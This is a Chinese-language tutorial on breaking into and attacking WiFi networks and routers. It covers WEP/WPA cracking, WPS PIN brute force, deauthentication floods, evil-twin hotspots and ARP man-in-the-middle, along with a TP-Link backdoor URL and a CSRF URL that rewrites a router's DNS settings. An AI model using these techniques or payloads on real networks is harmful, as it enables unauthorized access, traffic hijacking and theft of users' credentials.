0x00 Wifi破解方式
WEP破解
如果你的家用路由器的无线加密方式被配置为WEP加密,那么你就得马上进行修改了,因为由于WEP加密体制缺陷,蹭网者能够通过收集足够的握手包(即计算机与无线路由器连接认证过程中的数据包),使用分析密算法还原出密码。此类加密方式的攻击成功率基本接近100%。比较常见的攻击手法是使用MIDIWEP对周围的无线信号进行嗅探,当抓取到足够多的IVS时就可以自动解出无线密码,如下图所示:
WPA/WPA2爆破
无线路由器的另一种加密方式为WPA/WPA2加密,相比较于WEP加密,暂时未能从一些公开的方法中找到直接破解WPA/WPA2密码的方法,只能先抓获握手包,然后对握手包进行暴力破解,但是结合着一些技巧以及普通用户密码策略比较薄弱,成功的机率也比较高。
抓握手包跑字典,这主要看你的字典给不给力了,拼人品的时间到了,和破解wep操作一样的,选中信号点lanch开始抓包,抓包的时候路由器是一定要有用户使用,目的是攻击导致对方掉线,在自动重连的过程中抓取WPA认证的四次握手包。如果一直没找到在线的客户端,就抓不到包的,只能等有人用的时候再试了。
弹出下面这个提示,说明抓包成功了,把包拷出来用EWSA验证下是不是完整的握手包,要包含完整的四次握手信息才能用来破解。
只有提示是有效的数据包才能进行字典破解,像下面这样的数据包就是可以利用的。
接下来请出hashcat神器或者ewsa直接跑字典,(由于我的电脑配置不是很高 往往我选择的是)直接丢到淘宝让专业人士来跑
Pin码穷举攻击(WPS破解)
大部分无线路由器都有个WPS快速连接的功能,只要连接的时候输入路由器正确的pin管理码,就可以自动的根据算法协商密钥连上WiFi。这个pin码是8位纯数字,前4位和后4位是分开验证的,第8位是检验码(根据前7位按照一定的算法可以推出第8位)。也就是说如果要穷举这个pin码,只需要10^4+10^3=11000次,reaver就是干这个差事的工具。只要路由器开启了WPS功能,并且没有锁死WPS的机制,是百分百可以尝试出正确的pin码,得到pin码后就能获取到wpa密码了。而且大部分情况下,路由器出厂开放WPS功能哦:)。不过要说明的是有些路由器,试错pin码多次会锁死,这种情况下只能用第一种抓包跑密码了。
点击扫描出现路由器MAC 名称 等信息 带有WPS支持PIN码破解,扫描出来带有WPS路由器,点击Reaver进行PIN码穷举攻击。如下图
现已破解出PIN码
进行连接
在框中输入破解得到的pin码。点击下一步,软件会自动寻找路由,自动连接啦
腾达无线路由器PIN码漏洞
腾达无线路由器MAC地址以“C83A35”或“00B00C”打头的默认PIN码,可以算出来
把计算器调为程序员型,选十六进制,比如08:10:76:0F:B3:5C这个MAC地址,取后六位,输入完后选十进制就算出pin码前7位了,第8位程序会自己补全。
计算得到的 就是路由的pin的前7位了,pin码共由8位数字组成,前7位已经出来了,最后一位自己猜呀猜就出来了,猜出了就直接连接路由啦。
APP造成wifi密码泄漏
用WiFi万能钥匙获取WiFi密码,前提是已经root的安卓手机。WiFi万能钥匙从服务器获取到别人分享的密码来连接WiFi,断开后就把密码清除了。重点来了,WiFi在连接的过程中密码是保存在本机的/data/misc/wifi/wpa_supplicant.conf上的,我们可以强行终止WiFi万能钥匙进程,那密码就永久保存下来了,这时候用带文件管理器比如re或者es浏览器,打开/data/misc/wifi/wpa_supplicant.conf就能看到密码了。
或者装个app吧,搜下WiFi连接管理器,长按显示密码就行了,都需要root权限的。
0x01 WIFI攻击
中间人攻击
所谓中间人攻击就是目标主机与另一主机进行正常连接的过程中,攻击者通过拦截、插入、伪造、中断数据包等方式,达到获取对方登陆账户及密码,伪造身份等目的。
手机端进行ARP攻击
连接进入网络之后,使用dSploit扫描到的设备列表与路由器管理界面中的一模一样:
跳板攻击
- 基于软件无线跳板攻击
基于软件的无线跳板攻击是指在有线网络的基础上,加入了无线网络的环节,通过配合使用有线网络内的主机、笔记本作为传输节点,一一连接起来进行无线信号到有线网络的传输。
- 基于硬件无线跳板攻击
使用主机、无线路由器或者无线AP作为传输节点,并一一连接起来以便进行无线信号的传输,也就是常说的无线中继。
通过将多个无线AP中继,将原本内部的无线网络信号传递出来。
DHCP攻击
利用DHCP的脆弱性发起的攻击能够迅速耗尽IP地址池,导致大面积的业务瘫痪,而且难以追踪,危害性极大。
大量IP被占用
DDOS攻击
验证洪水攻击
和传统的有线网络一样,无线路由器也会面临无线DOS攻击的威胁
我们使用mdk3来测试验证洪水攻击。
我们可以看到mdk3伪造了大量的虚假客户端去连接chinanet,MA地址也都是随机伪造的。
取消验证洪水攻击
-
客户端与AP建立连接
-
通过广播插入伪造的取消身份验证报文
-
客户端认为该报文来自AP
-
已连接的客户端自行断开连接
这种攻击不是针对AP的,而是针对于client的,当我们发动攻击的时候我们可以马上看到无法访问网络了,见效很快。此时我们可以利用-s参数来加快发包速率。这种效率是非常高的,一般发动开始,client便开始断网。
0x02 WIFI钓鱼
被动式攻击
建立虚假wifi热点,等候别人的连接,安装tcpdump等工具进行抓包窃取数据。
主动式攻击
利用智能手机 Wi-Fi 广播 协议的缺陷 / 自动接入设计进行攻击。
手机连接过WIFI热点信息之后会保存在手机里,每次进入无线覆盖范围就会自动接入。
公开WIFI热点
中国移动热点:CMCC、CMCC-EDU 等
中国联通热点:ChinaUnicom 等
中国电信热点:ChinaNet、ChinaTelecom 等
无线设备为了加快连接速度,会对外广播过它连接过什么无线,ssid是多少。如果我截获到了这个广播,我自然能知道你连过什么无线,把这个无线伪造出来
建立相同SSID 切没有密码的ap热点,手机会主动连接手机里已连接过的AP热点,连接的时候只验证SSID是否相同,当不存在密码的时候,不用去验证,会主动连接。(应该是安卓4.2以下版本可以)。
国产手机自带的Wlan服务(删都删不掉)
将运营商的 Wi-Fi 热点内置到你的手机中,更有甚者一些手机中这几个 Wi-Fi 你都删不掉,碰到了就连上,这样的情况下 我们随意建立一个类似于CMCC 等热点就可以进行信息窃取。
0x03 设备攻防
TP-link后门
TP-LINK的某些型号的路由器存在一个后门功能,通过访问某个无需授权认证的特定页面,路由器会自动从攻击者控制的TFTP服务器上下载程序并执行。攻击者利用这个漏洞可以在路由器上以root身份执行任意命令,从而可完全控制路由器。
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html ” ,路由器会从发起请求的机器通过tftp下载一个nart.out文件,并以root权限执行该文件。
CSRF攻击
IE不支持Http Authentication 使用此方法在IE下攻击是无效的 完美兼容FF chrome。
http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1= 192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&Save=%25B1%25A3+%25B4%25E6
烽火通信某款路由器被爆存在漏洞-可远程修改DNS
0x04 路由器攻破可以干什么?
网络出口流量控制在你手里,手机端利用更新 系统漏洞挂马? PC端利用IE等漏洞来挂马? 窃取登录密码等等。
控制路由器就等于控制80%以上的通讯数据包,利用方式和局域网嗅探、劫持大同小异。